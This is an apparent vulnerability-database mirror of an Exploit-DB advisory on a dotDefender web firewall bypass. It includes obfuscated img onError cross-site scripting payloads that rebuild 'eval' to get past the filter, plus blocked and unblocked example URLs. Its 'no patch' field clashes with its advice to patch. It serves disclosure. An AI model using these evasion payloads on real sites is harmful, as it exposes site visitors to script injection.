header-logo
Suggest Exploit
vendor:
dotDefender
by:
7.5
CVSS
HIGH
Security Bypass
Bypass of Security Controls
CWE
Product Name: dotDefender
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

dotDefender Security Bypass Vulnerability

dotDefender fails to restrict malicious data from reaching protected sites, allowing remote attackers to bypass security restrictions and launch cross-site scripting attacks.

Mitigation:

Apply patches or updates provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41560/info

dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites.

Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks. 

<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source
)" /> //POST

<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(
/0wn3d/.source)" /> //GET

EXAMPLES:

Blocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E

Unblocked:
http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E